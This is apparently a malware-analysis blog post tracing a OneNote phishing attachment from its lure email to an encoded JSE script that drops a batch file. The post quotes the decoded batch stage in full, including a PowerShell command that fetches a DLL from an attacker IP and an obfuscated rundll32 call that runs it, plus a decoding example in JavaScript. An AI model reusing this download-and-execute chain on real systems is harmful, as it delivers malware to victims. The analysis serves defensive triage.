"Are You at Risk? OneNote Attachments in Phishing Emails" - Understanding a New Threat Vector

  • The primary goals of this post are to:
    1. Identify a sample and begin the triage process.
    2. Identify patterns or groupings of email subjects and attachment names.
    3. Capture the attack chain and note relevant findings.

Sample | MD5 | SHA-256
Document_HM63(Feb15).one | 6501f736559758dffb5290bb76a1c168 | 09d582f8132b98d50be60207f8f18f1187fa142e4e6d29e56372f87a0cbd4069


As end-users become increasingly aware of the risks associated with malicious macro email attachments, malware authors have started exploring new methods of delivery. Since January, there have been reports of a new wave of phishing emails that carry OneNote (.one) file attachments. In this post, we will dive into this new threat vector and explore the attack chain as we observe it. We will also identify themes of phishing emails circulating in the wild (ITW), review attachment file name variations, and their antivirus detection names. Lastly, we'll get hands-on and examine one of the samples. Let's get started!

There are several ways to obtain malware samples for analysis, such as leveraging access to malware repositories or looking through open source blogs for shared samples. Just remember to give credit in any formal products or reports. In this post, we will examine a sample obtained from VirusTotal (VT). Don't worry, all references for this analysis will be listed at the bottom.

 

— The Email —

Beginning with Figure 1, we see an example email that exhibits several characteristics commonly found in phishing emails. Its tone conveys a sense of urgency and strongly encourages the recipient to open the attached OneNote (.one) file immediately. In the body of the email, we see the thread (conversation) hijacking method being used, which is often leveraged to make the recipient believe they are continuing a previous conversation. This method is believable because legitimate emails taken from previously compromised systems are reused. By keeping the entire thread intact, the malware author can spoof the legitimate sender and reply to the thread, making others believe the email is real.

 

— Analyzing the Attachment —

Before anything executes, opening the attachment reveals a OneNote notebook page. A message instructs the user to click "Open" to access additional attachments stored in the cloud. Clicking the "Open" link causes the embedded .JSE file (Open.jse) to be launched by the Windows Script Host (WSH), WScript.exe. Viewing this .JSE file in Notepad shows only encoded content; using the Windows Script Decoder, we can quickly decode it and view the script's content for further analysis.

To better understand the functionality of the code, an online JavaScript compiler can be used to break it up into pieces. Beginning with the largest function, 'avmJaznDU' appears to manipulate the string assigned to the 'data' variable. Within this function, the substr() method takes a substring of 'string_data' starting at index i with a length of 2. This effectively breaks 'string_data' into pairs of characters and outputs them one at a time.

Figure 7. Decoded JSE Script

Each pair is then passed to the parseInt() function with a radix of 16 (hexadecimal) to convert it from a hexadecimal value to a decimal value. That value is passed as an argument to the aQHuT8UN() function, which returns a character. The character is concatenated to the string stored in parsed_data. The for loop repeats this process for every pair of characters in string_data, effectively converting the entire string from hexadecimal to ASCII (see Figure 8). Finally, a new file named a8imoZ.cmd is created, and the concatenated data is written to it. The last line creates a new ActiveXObject, which allows the script to interact with Windows. This object is used to run the command 'a8imoZ.cmd NDLL' with a window-style parameter of 0, which keeps the window hidden from the victim when it executes.

	@echo off
	powershell.exe IWR -uri http://138.199.46.15/123/877173.dat -o %temp%\aQg9MHOT.tmp
	ru%132 %temp%\aQg9MHOT.tmp,Wind
	( del /q /f "%~f0" >nul 2>&1 & exit /b 0  )

Figure 8. Open.jse Decoded Data

Reviewing the code snippet above, the final payload is downloaded from http://138.199.46.15/123/ and written to the %TEMP% directory as "aQg9MHOT.tmp". Once it is in the %TEMP% directory, a slightly obfuscated rundll32 command is executed: cmd.exe expands %1 to the batch file's first argument (NDLL, from 'a8imoZ.cmd NDLL'), so "ru%132" becomes "ruNDLL32", which loads the dropped file and calls its "Wind" export. It is worth noting that running the file command on "aQg9MHOT.tmp" confirms that it is a DLL.
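To see the decoding loop from Figure 7 and the batch-argument trick behind the rundll32 line in Figure 8 worked end to end, here is an added example (my own code, not the malware's script or anything from the original post). It decodes a hex-pair string the way avmJaznDU does, expands %1 as cmd.exe would for 'a8imoZ.cmd NDLL', and pulls out the indicators a responder wants; the URL, file names and the hex input are constructed placeholders.

```javascript
// Added example (not from the original post or the malware author's script): it
// re-implements the hex-pair decoding loop described above and the cmd.exe
// argument expansion that hides "rundll32", then pulls triage indicators out.

// Mirrors the avmJaznDU loop: substr(i, 2) -> parseInt(pair, 16) -> character.
function decodeHexPairs(stringData) {
  if (stringData.length % 2 !== 0) throw new Error("odd-length hex string");
  let parsedData = "";
  for (let i = 0; i < stringData.length; i += 2) {
    const pair = stringData.substr(i, 2);
    const code = parseInt(pair, 16);
    if (Number.isNaN(code)) throw new Error(`bad hex pair at offset ${i}: ${pair}`);
    parsedData += String.fromCharCode(code);
  }
  return parsedData;
}

// cmd.exe replaces %1..%9 with the batch file's arguments, so "ru%132" run as
// "a8imoZ.cmd NDLL" becomes "ruNDLL32". Environment variables (%temp%) are left alone.
function expandBatchArgs(batchText, args) {
  return batchText.replace(/%([1-9])/g, (_, n) => args[n - 1] ?? "");
}

// Extract the download URL, the dropped file and the rundll32 call (DLL + export).
function extractIndicators(batchText) {
  const url = batchText.match(/https?:\/\/\S+/i)?.[0] ?? null;
  const dropped = batchText.match(/\s-o\s+(\S+)/i)?.[1] ?? null;
  const m = batchText.match(/^rundll32\s+(\S+),(\S+)/im);
  const loader = m ? { dll: m[1], exportName: m[2] } : null;
  return { url, dropped, loader };
}

function analyzeDecodedJse(hexString, batchArgs) {
  const batch = expandBatchArgs(decodeHexPairs(hexString), batchArgs);
  return { batch, indicators: extractIndicators(batch) };
}

// Constructed sample standing in for the real string_data (placeholder URL and names).
const CONSTRUCTED_CMD =
  "@echo off\r\n" +
  "powershell.exe IWR -uri http://example.invalid/123/stage2.dat -o %temp%\\stage2.tmp\r\n" +
  "ru%132 %temp%\\stage2.tmp,Wind\r\n" +
  '( del /q /f "%~f0" >nul 2>&1 & exit /b 0 )\r\n';
// Hex-encode it only to build the sample input; a real case starts from the hex string.
const SAMPLE_HEX = [...CONSTRUCTED_CMD]
  .map((c) => c.charCodeAt(0).toString(16).padStart(2, "0")).join("");

console.log(analyzeDecodedJse(SAMPLE_HEX, ["NDLL"]).indicators);
```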

Figure 9. File Command - TMP File


— The Attack Chain —

So far in our analysis, we have seen the first few phases of the execution chain, starting from the initial email to the final payload, which is a DLL called aQg9MHOT.tmp. Below is an illustration of our observations thus far.


Figure 10. Attack Chain

This process starts with the user receiving an email carrying a OneNote (.one) attachment. When the user clicks "Open" inside the attachment, Open.jse is launched by WScript.exe; it creates a CMD file that launches PowerShell to download the final payload (DLL), which is then loaded with rundll32.



Reverse Look

I’m just a regular person trying to get really good at a thing.

https://www.onereverselook.com/